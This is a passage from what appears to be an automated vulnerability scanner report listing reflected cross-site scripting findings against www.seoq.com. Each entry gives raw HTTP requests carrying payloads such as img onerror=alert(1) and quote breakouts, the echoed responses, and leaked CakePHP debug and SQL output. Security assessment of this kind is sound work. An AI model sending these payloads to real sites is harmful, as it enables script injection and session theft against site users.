<a href="http://www.seoq.com/quotient/2011/04/22/1798/N10e4c"><img src=a onerror=alert(1)>fdf07480bd7" title="SEO Quotient for ">
...[SNIP]...

7.94. http://www.seoq.com/quotient/2011/04/22/1798/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/1798/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a543b'%3b2545d1f9485 was submitted in the REST URL parameter 6. This input was echoed as a543b';2545d1f9485 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/1798/Na543b'%3b2545d1f9485 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:58 GMT
Server: Apache
Set-Cookie: CAKEPHP=mmj8kuukdd1rlb7pp2ne3jf3v3; expires=Mon, 09-May-2011 02:52:58 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/1798/Na543b';2545d1f9485';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.95. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e3a"><img%20src%3da%20onerror%3dalert(1)>74f4e28a186 was submitted in the REST URL parameter 5. This input was echoed as d7e3a"><img src=a onerror=alert(1)>74f4e28a186 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270d7e3a"><img%20src%3da%20onerror%3dalert(1)>74f4e28a186/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:54 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2270d7e3a"><img src=a onerror=alert(1)>74f4e28a186/N" title="SEO Quotient for ">
...[SNIP]...

7.96. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9927b'%3bea8e15f9683 was submitted in the REST URL parameter 5. This input was echoed as 9927b';ea8e15f9683 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/22709927b'%3bea8e15f9683/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:55 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/22709927b';ea8e15f9683/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.97. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e15d9<img%20src%3da%20onerror%3dalert(1)>1f903fbffe7 was submitted in the REST URL parameter 5. This input was echoed as e15d9<img src=a onerror=alert(1)>1f903fbffe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270e15d9<img%20src%3da%20onerror%3dalert(1)>1f903fbffe7/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:00 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55871


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 2270e15d9<img src=a onerror=alert(1)>1f903fbffe7 and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.98. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3caeb<img%20src%3da%20onerror%3dalert(1)>66d932dc0c2 was submitted in the REST URL parameter 6. This input was echoed as 3caeb<img src=a onerror=alert(1)>66d932dc0c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270/N3caeb<img%20src%3da%20onerror%3dalert(1)>66d932dc0c2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:25 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:26 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>66d932dc0c2" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2270/N3caeb<img src=a onerror=alert(1)>66d932dc0c2ddd</a>
...[SNIP]...

7.99. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 884bf"><img%20src%3da%20onerror%3dalert(1)>9c07f8e8c0e was submitted in the REST URL parameter 6. This input was echoed as 884bf"><img src=a onerror=alert(1)>9c07f8e8c0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2270/N884bf"><img%20src%3da%20onerror%3dalert(1)>9c07f8e8c0e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:21 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2270/N884bf"><img src=a onerror=alert(1)>9c07f8e8c0e" title="SEO Quotient for ">
...[SNIP]...

7.100. http://www.seoq.com/quotient/2011/04/22/2270/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2270/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65697'%3ba38fc3b641e was submitted in the REST URL parameter 6. This input was echoed as 65697';a38fc3b641e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2270/N65697'%3ba38fc3b641e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:21 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2270/N65697';a38fc3b641e';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.101. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb0a7"><img%20src%3da%20onerror%3dalert(1)>7c5aa4a2ff9 was submitted in the REST URL parameter 5. This input was echoed as fb0a7"><img src=a onerror=alert(1)>7c5aa4a2ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2271fb0a7"><img%20src%3da%20onerror%3dalert(1)>7c5aa4a2ff9/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:03 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2271fb0a7"><img src=a onerror=alert(1)>7c5aa4a2ff9/N" title="SEO Quotient for ">
...[SNIP]...

7.102. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1df87<img%20src%3da%20onerror%3dalert(1)>8d2c0db8f8a was submitted in the REST URL parameter 5. This input was echoed as 1df87<img src=a onerror=alert(1)>8d2c0db8f8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/22711df87<img%20src%3da%20onerror%3dalert(1)>8d2c0db8f8a/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 55865


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
< 22711df87<img src=a onerror=alert(1)>8d2c0db8f8a and
site_url LIKE 'N' ORDER BY `report_date` DESC LIMIT 2 </p>
...[SNIP]...

7.103. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7152a'%3b46cb5a92766 was submitted in the REST URL parameter 5. This input was echoed as 7152a';46cb5a92766 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/22717152a'%3b46cb5a92766/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:04 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/22717152a';46cb5a92766/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.104. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fa882<img%20src%3da%20onerror%3dalert(1)>364ce087de6 was submitted in the REST URL parameter 6. This input was echoed as fa882<img src=a onerror=alert(1)>364ce087de6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2271/Nfa882<img%20src%3da%20onerror%3dalert(1)>364ce087de6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:31 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:32 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<img src=a onerror=alert(1)>364ce087de6" title="SEO Quotient for ">http://www.seoq.com/quotient/2011/04/22/2271/Nfa882<img src=a onerror=alert(1)>364ce087de6ddd</a>
...[SNIP]...

7.105. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a07d'%3b128b7d3a24e was submitted in the REST URL parameter 6. This input was echoed as 6a07d';128b7d3a24e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/2271/N6a07d'%3b128b7d3a24e HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54542


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/2271/N6a07d';128b7d3a24e';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.106. http://www.seoq.com/quotient/2011/04/22/2271/N [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2271/N

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e219d"><img%20src%3da%20onerror%3dalert(1)>386ed1751a4 was submitted in the REST URL parameter 6. This input was echoed as e219d"><img src=a onerror=alert(1)>386ed1751a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/2271/Ne219d"><img%20src%3da%20onerror%3dalert(1)>386ed1751a4 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:27 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 48178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/2271/Ne219d"><img src=a onerror=alert(1)>386ed1751a4" title="SEO Quotient for ">
...[SNIP]...

7.107. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14fd7'%3b0c772ed9b7b was submitted in the REST URL parameter 5. This input was echoed as 14fd7';0c772ed9b7b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quotient/2011/04/22/227214fd7'%3b0c772ed9b7b/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:50 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 54591


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<script type="text/javascript">    
$(function() {
$("#tabs").tabs();
});

function fbs_click() {u='http://www.seoq.com/quotient/2011/04/22/227214fd7';0c772ed9b7b/N';t='facebook_status';window.open('http://www.facebook.com/sharer.php?u='+encodeURIComponent(u)+'&t='+encodeURIComponent(t),'sharer','toolbar=0,status=0,width=626,height=436');return false;}

...[SNIP]...

7.108. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e62"><img%20src%3da%20onerror%3dalert(1)>ec3b20cb8bc was submitted in the REST URL parameter 5. This input was echoed as 11e62"><img src=a onerror=alert(1)>ec3b20cb8bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/227211e62"><img%20src%3da%20onerror%3dalert(1)>ec3b20cb8bc/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:49 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 56035


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
<a href="http://www.seoq.com/quotient/2011/04/22/227211e62"><img src=a onerror=alert(1)>ec3b20cb8bc/N" title="SEO Quotient for ">
...[SNIP]...

7.109. http://www.seoq.com/quotient/2011/04/22/2272/N [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7afe1<img%20src%3da%20onerror%3dalert(1)>6a57730655e was submitted in the REST URL parameter 5. This input was echoed as 7afe1<img src=a onerror=alert(1)>6a57730655e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quotient/2011/04/22/22727afe1<img%20src%3da%20onerror%3dalert(1)>6a57730655e/N HTTP/1.1
Accept: */*
Accept-Language: en-US
